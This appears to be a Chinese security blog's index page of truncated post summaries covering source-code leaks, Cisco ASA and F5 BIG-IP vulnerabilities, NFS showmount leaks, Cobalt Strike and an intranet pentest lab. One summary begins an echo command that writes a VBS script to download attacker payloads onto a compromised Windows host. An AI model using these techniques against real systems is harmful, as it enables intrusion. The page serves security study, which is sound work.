zw1sh

摘要： 一、源码(备份文件)泄露 #####1、git泄露 Git是一个开源的分布式版本控制系统，在执行git init初始化目录的时候，会在当前目录下自动创建一个.git目录，用来记录代码的变更记录等。发布代码的时候，如果没有把.git这个目录删除，就直接发布到了服务器上，攻击者就可以通过它来恢复源代码 阅读全文

摘要： 1、漏洞描述 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞，允许未经身份验证的远程攻击者进行目录遍历攻击并读取目 阅读全文

摘要： 说多了都是泪，中午禁用一个开机启动项时把麦克风权限关闭了，开启了就能正常使用摄像头了。 阅读全文

摘要： 当获取到内网一台windows主机时，其不能上传shell，可以执行命令，这时候可以上传或者从我们的服务器上下载payload 1、vbs #首先先向windows写入一个vbs脚本 echo set a=createobject(^"adod^"+^"b.stream^"):set w=creat 阅读全文

摘要： 记录一下扫描和测试中遇到的一个漏洞：目标主机showmount -e信息泄露 先了解一下showmount命令： showmount命令用于查询NFS服务器 (NFS 网络文件系统) # showmount --help Usage: showmount [-adehv] [--all] [--di 阅读全文

摘要： 这几天通报了f5的一个漏洞，想着先弄个环境保存着，说不定后面就用到了。。 1、漏洞描述 ​ 近日，F5官方发布公告，修复了流量管理用户界面（TMUI）中存在的一个远程代码执行漏洞（CVE-2020-5902）。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对 阅读全文

摘要： CobaltStrike的使用 Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，exe、powershell木马生成等。但现在已经独立出来了 1、安装 网上的资源和安装还是挺多的，但安全性可能就没保障了。 阅读全文

摘要： 1、安装anaconda3 wget https://mirrors.tuna.tsinghua.edu.cn/anaconda/archive/Anaconda3-5.0.1-Linux-x86_64.sh bash ~/Anaconda3-5.0.1-Linux-x86_64.sh #yes,E 阅读全文

摘要： 1、搭建环境： 内网中有一台win server2008服务器、一台linux主机，一台windows或linux主机 这里主要的目标是获得PC1的shell 2、信息搜集 nmap扫一下该服务器： 先访问一下80端口，发现有一个网站页面 先用nikto扫一下该网站：发现了网站的架构，还有一些网站的 阅读全文

摘要： 阿里云服务器安装jupyter 1、安装jupyter 这里网上一些文章大部分都需要先安装Anaconda或virtualenv虚拟环境，但我为了简便直接用pip3装jupyter；这里最好用pip3安装，如果你有python2和python3的环境的话就都可以使用 pip3 install jup 阅读全文